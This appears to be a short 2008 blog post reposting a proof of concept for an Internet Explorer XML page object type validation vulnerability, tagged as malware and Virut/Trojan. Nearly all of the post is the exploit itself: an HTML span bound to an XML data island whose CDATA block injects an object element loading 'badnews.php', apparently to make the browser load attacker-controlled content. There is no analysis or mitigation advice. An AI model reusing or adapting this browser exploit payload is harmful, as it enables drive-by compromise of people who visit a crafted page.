Jun 21, 2008
77 Views

[malware]Microsoft Internet Explorer XML Page Object Type Validation Vulnerability

Written by

The following proof of concept has been supplied:

<span datasrc=”#oExec” datafld=”exploit” dataformatas=”html”></span>
<xml id=”oExec”>
<security>
<exploit>
<![CDATA[
<object id=”oFile” data=”badnews.php”></object>
]]>
</exploit>
</security>
</xml>

Article Tags:
·
Article Categories:
Virut/Trojan
    http://linholiver.com

    https://linholiver.com/diary/about/